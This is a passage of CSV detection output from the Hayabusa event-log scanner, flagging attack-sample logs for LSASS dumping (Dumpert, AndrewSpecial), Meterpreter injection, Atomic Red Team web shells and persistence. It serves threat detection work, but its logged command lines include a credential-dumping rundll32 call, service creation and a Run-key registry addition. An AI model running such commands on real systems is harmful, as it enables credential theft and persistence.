""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo : Path: C:\Windows\System32\systeminfo.exe : User: IEWIN7\IEUser : Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx -2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Outflank-Dumpert.exe : Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump : Path: C:\Windows\System32\rundll32.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: AndrewSpecial.exe : Path: C:\Users\administrator\Desktop\AndrewSpecial.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx -2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\notepad.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,1,high,Rundll32 Without Parameters,,rules/sigma/process_creation/win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-04 05:39:30.254 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx -2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:PowerShell/Powersploit.M : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:00.730 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:XML/Exeselrun.gen!A : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:40:16.396 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:16.418 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Backdoor:ASP/Ace.T : Severity: Severe : Type: Backdoor : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:17.508 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: Trojan:Win32/Sehyioa.A!cl : Severity: Severe : Type: Trojan : User: MSEDGEWIN10\IEUser : Path: file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:41:48.236 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.275 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Alert,Threat: HackTool:JS/Jsprat : Severity: High : Type: Tool : User: MSEDGEWIN10\IEUser : Path: containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) : Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:51:50.798 +09:00,MSEDGEWIN10,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.900 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.902 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.905 +09:00,MSEDGEWIN10,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 05:53:31.952 +09:00,MSEDGEWIN10,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/WinDefender_Events_1117_1116_AtomicRedTeam.evtx -2019-07-19 23:42:51.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA21C70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:42:53.295 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:43:03.303 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe create AtomicTestService binPath= C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.185 +09:00,MSEDGEWIN10,1,low,New Service Creation,,rules/sigma/process_creation/win_new_service_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.268 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.288 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe start AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe start AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:08.307 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe stop AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe stop AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.176 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.253 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.278 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc.exe delete AtomicTestService : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""sc.exe delete AtomicTestService""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:09.351 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:32.101 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : Path: C:\AtomicRedTeam\atomics\T1050\bin\AtomicService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.219 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:44:53.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD "" ""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V Atomic"" Red ""Team /t REG_SZ /F /D C:\Path\AtomicRedTeam.exe : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: 